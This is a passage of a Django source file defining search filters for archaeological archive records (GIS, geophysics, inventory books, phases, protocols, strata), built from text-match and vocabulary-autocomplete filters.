'find_type',
'find_inventory_number',
'find_local_number',
'convolute_inventory_number',
'corresponding_to_inventory_number',
'stratum_id_relative',
'stratum_id_absolute_prepub',
'find_comment',
'excavation_object_id',
'phase_id',
'access',
'storage_find',
'stratum_comment',
'uncertainty_excavation_digitisation',
'find_date',
'relatedto',
'digitisation_comment',
]
class GISListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('legacy_id').help_text,
label=GIS._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_name').help_text,
label=GIS._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_directory').help_text,
label=GIS._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_type').help_text,
label=GIS._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_filename').help_text,
label=GIS._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('fc_extension').help_text,
label=GIS._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('filename').help_text,
label=GIS._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('document_id').help_text,
label=GIS._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('document_title').help_text,
label=GIS._meta.get_field('document_title').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('path_filename_old').help_text,
label=GIS._meta.get_field('path_filename_old').verbose_name
)
path_filename_arche = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('path_filename_arche').help_text,
label=GIS._meta.get_field('path_filename_arche').verbose_name
)
software_used = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('software_used').help_text,
label=GIS._meta.get_field('software_used').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('original_comment').help_text,
label=GIS._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=GIS._meta.get_field('digitisation_comment').help_text,
label=GIS._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=GIS._meta.get_field('file_extension_original').help_text,
label=GIS._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=GIS._meta.get_field('file_extension_archivalobject').help_text,
label=GIS._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=GIS._meta.get_field('copyright').help_text,
label=GIS._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=GIS._meta.get_field('access').help_text,
label=GIS._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=GIS._meta.get_field('site_id').help_text,
label=GIS._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=GIS._meta.get_field('excavation_post_excavation').help_text,
label=GIS._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = GIS
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'document_type',
'filename',
'document_id',
'document_title',
'path_filename_old',
'path_filename_arche',
'creation_date_original',
'software_used',
'creation_date_archivalobject',
'creation_date_metadata',
'excavation_object_id',
'archaeological_object_id',
'relatedto',
'original_comment',
'digitisation_comment',
'file_extension_original',
'file_extension_archivalobject',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
class GeophysicsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('legacy_id').help_text,
label=Geophysics._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_name').help_text,
label=Geophysics._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_directory').help_text,
label=Geophysics._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_type').help_text,
label=Geophysics._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_filename').help_text,
label=Geophysics._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('fc_extension').help_text,
label=Geophysics._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('filename').help_text,
label=Geophysics._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('document_id').help_text,
label=Geophysics._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('document_title').help_text,
label=Geophysics._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('filename_old').help_text,
label=Geophysics._meta.get_field('filename_old').verbose_name
)
path_filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('path_filename_old').help_text,
label=Geophysics._meta.get_field('path_filename_old').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('original_comment').help_text,
label=Geophysics._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Geophysics._meta.get_field('digitisation_comment').help_text,
label=Geophysics._meta.get_field('digitisation_comment').verbose_name
)
file_extension_original = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_original"
),
help_text=Geophysics._meta.get_field('file_extension_original').help_text,
label=Geophysics._meta.get_field('file_extension_original').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_original",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
file_extension_archivalobject = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension_archivalobject"
),
help_text=Geophysics._meta.get_field('file_extension_archivalobject').help_text,
label=Geophysics._meta.get_field('file_extension_archivalobject').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension_archivalobject",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
method = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="method"
),
help_text=Geophysics._meta.get_field('method').help_text,
label=Geophysics._meta.get_field('method').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/method",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment"
),
help_text=Geophysics._meta.get_field('equipment').help_text,
label=Geophysics._meta.get_field('equipment').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Geophysics._meta.get_field('copyright').help_text,
label=Geophysics._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Geophysics._meta.get_field('access').help_text,
label=Geophysics._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Geophysics._meta.get_field('site_id').help_text,
label=Geophysics._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Geophysics._meta.get_field('excavation_post_excavation').help_text,
label=Geophysics._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Geophysics
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_archivalobject',
'document_type',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_date_archivalobject',
'creation_date_metadata',
'path_filename_old',
'excavation_object_id',
'original_comment',
'digitisation_comment',
'file_extension_original',
'file_extension_archivalobject',
'method',
'equipment',
'copyright',
'access',
'site_id',
'excavation_post_excavation',
]
class InventorybooksListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('legacy_id').help_text,
label=Inventorybooks._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_name').help_text,
label=Inventorybooks._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_directory').help_text,
label=Inventorybooks._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_type').help_text,
label=Inventorybooks._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_filename').help_text,
label=Inventorybooks._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('fc_extension').help_text,
label=Inventorybooks._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('filename').help_text,
label=Inventorybooks._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('document_id').help_text,
label=Inventorybooks._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('document_title').help_text,
label=Inventorybooks._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('filename_old').help_text,
label=Inventorybooks._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('creation_year_original').help_text,
label=Inventorybooks._meta.get_field('creation_year_original').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('storage_folder_original').help_text,
label=Inventorybooks._meta.get_field('storage_folder_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Inventorybooks._meta.get_field('original_comment').help_text,
label=Inventorybooks._meta.get_field('original_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Inventorybooks._meta.get_field('file_extension').help_text,
label=Inventorybooks._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Inventorybooks._meta.get_field('copyright').help_text,
label=Inventorybooks._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Inventorybooks._meta.get_field('access').help_text,
label=Inventorybooks._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Inventorybooks._meta.get_field('site_id').help_text,
label=Inventorybooks._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Inventorybooks._meta.get_field('equipment_scan').help_text,
label=Inventorybooks._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Inventorybooks._meta.get_field('source_original_copy_edited_copy').help_text,
label=Inventorybooks._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Inventorybooks._meta.get_field('original_material').help_text,
label=Inventorybooks._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Inventorybooks._meta.get_field('excavation_post_excavation').help_text,
label=Inventorybooks._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Inventorybooks
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'document_type',
'convolute_inventory_number',
'bone_stone_inventory_number',
'filename',
'document_id',
'document_title',
'filename_old',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'find_inventory_number',
'original_comment',
'file_extension',
'copyright',
'access',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
class PhasenIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('legacy_id').help_text,
label=PhasenID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_name').help_text,
label=PhasenID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_directory').help_text,
label=PhasenID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_type').help_text,
label=PhasenID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_filename').help_text,
label=PhasenID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('fc_extension').help_text,
label=PhasenID._meta.get_field('fc_extension').verbose_name
)
phase_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="phase_type"
),
help_text=PhasenID._meta.get_field('phase_type').help_text,
label=PhasenID._meta.get_field('phase_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/phase_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=PhasenID._meta.get_field('site_id').help_text,
label=PhasenID._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
phase_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('phase_id').help_text,
label=PhasenID._meta.get_field('phase_id').verbose_name
)
phase_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=PhasenID._meta.get_field('phase_title').help_text,
label=PhasenID._meta.get_field('phase_title').verbose_name
)
containing_phase_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="containing_phase_id"
),
help_text=PhasenID._meta.get_field('containing_phase_id').help_text,
label=PhasenID._meta.get_field('containing_phase_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/containing_phase_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = PhasenID
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'phase_type',
'site_id',
'phase_id',
'phase_title',
'area',
'containing_phase_id',
]
class ProtocolsListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('legacy_id').help_text,
label=Protocols._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('fc_name').help_text,
label=Protocols._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('fc_directory').help_text,
label=Protocols._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('fc_type').help_text,
label=Protocols._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('fc_filename').help_text,
label=Protocols._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('fc_extension').help_text,
label=Protocols._meta.get_field('fc_extension').verbose_name
)
filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('filename').help_text,
label=Protocols._meta.get_field('filename').verbose_name
)
document_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('document_id').help_text,
label=Protocols._meta.get_field('document_id').verbose_name
)
document_title = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('document_title').help_text,
label=Protocols._meta.get_field('document_title').verbose_name
)
filename_old = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('filename_old').help_text,
label=Protocols._meta.get_field('filename_old').verbose_name
)
creation_year_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('creation_year_original').help_text,
label=Protocols._meta.get_field('creation_year_original').verbose_name
)
storage_folder_original = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('storage_folder_original').help_text,
label=Protocols._meta.get_field('storage_folder_original').verbose_name
)
original_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('original_comment').help_text,
label=Protocols._meta.get_field('original_comment').verbose_name
)
digitisation_comment = django_filters.CharFilter(
lookup_expr='icontains',
help_text=Protocols._meta.get_field('digitisation_comment').help_text,
label=Protocols._meta.get_field('digitisation_comment').verbose_name
)
file_extension = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="file_extension"
),
help_text=Protocols._meta.get_field('file_extension').help_text,
label=Protocols._meta.get_field('file_extension').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/file_extension",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
copyright = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="copyright"
),
help_text=Protocols._meta.get_field('copyright').help_text,
label=Protocols._meta.get_field('copyright').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/copyright",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
access = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="access"
),
help_text=Protocols._meta.get_field('access').help_text,
label=Protocols._meta.get_field('access').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/access",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
storage = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="storage"
),
help_text=Protocols._meta.get_field('storage').help_text,
label=Protocols._meta.get_field('storage').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/storage",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=Protocols._meta.get_field('site_id').help_text,
label=Protocols._meta.get_field('site_id').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/site_id",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
equipment_scan = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="equipment_scan"
),
help_text=Protocols._meta.get_field('equipment_scan').help_text,
label=Protocols._meta.get_field('equipment_scan').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/equipment_scan",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
source_original_copy_edited_copy = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="source_original_copy_edited_copy"
),
help_text=Protocols._meta.get_field('source_original_copy_edited_copy').help_text,
label=Protocols._meta.get_field('source_original_copy_edited_copy').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/source_original_copy_edited_copy",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
original_material = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="original_material"
),
help_text=Protocols._meta.get_field('original_material').help_text,
label=Protocols._meta.get_field('original_material').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/original_material",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
excavation_post_excavation = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="excavation_post_excavation"
),
help_text=Protocols._meta.get_field('excavation_post_excavation').help_text,
label=Protocols._meta.get_field('excavation_post_excavation').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/excavation_post_excavation",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
class Meta:
model = Protocols
fields = [
'id',
'legacy_id',
'fc_name',
'fc_directory',
'fc_type',
'fc_filename',
'fc_match',
'creator_metadata',
'creator_original',
'creator_scan',
'excavation_object_id',
'filename',
'document_id',
'document_title',
'filename_old',
'document_type',
'creation_date_original',
'creation_year_original',
'creation_date_scan',
'creation_date_metadata',
'storage_folder_original',
'resolution_scan_dpi',
'archaeological_object_id',
'number_of_pages',
'original_comment',
'digitisation_comment',
'file_extension',
'copyright',
'access',
'storage',
'site_id',
'equipment_scan',
'source_original_copy_edited_copy',
'original_material',
'excavation_post_excavation',
]
class StratenIDListFilter(django_filters.FilterSet):
legacy_id = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('legacy_id').help_text,
label=StratenID._meta.get_field('legacy_id').verbose_name
)
fc_name = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('fc_name').help_text,
label=StratenID._meta.get_field('fc_name').verbose_name
)
fc_directory = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('fc_directory').help_text,
label=StratenID._meta.get_field('fc_directory').verbose_name
)
fc_type = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('fc_type').help_text,
label=StratenID._meta.get_field('fc_type').verbose_name
)
fc_filename = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('fc_filename').help_text,
label=StratenID._meta.get_field('fc_filename').verbose_name
)
fc_extension = django_filters.CharFilter(
lookup_expr='icontains',
help_text=StratenID._meta.get_field('fc_extension').help_text,
label=StratenID._meta.get_field('fc_extension').verbose_name
)
stratum_type = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="stratum_type"
),
help_text=StratenID._meta.get_field('stratum_type').help_text,
label=StratenID._meta.get_field('stratum_type').verbose_name,
method=generous_concept_filter,
widget=autocomplete.Select2Multiple(
url="/vocabs-ac/specific-concept-ac/stratum_type",
attrs={
'data-placeholder': 'Autocomplete ...',
'data-minimum-input-length': 2,
},
)
)
site_id = django_filters.ModelMultipleChoiceFilter(
queryset=SkosConcept.objects.filter(
collection__name="site_id"
),
help_text=StratenID._meta.get_field('site_id').help_text,
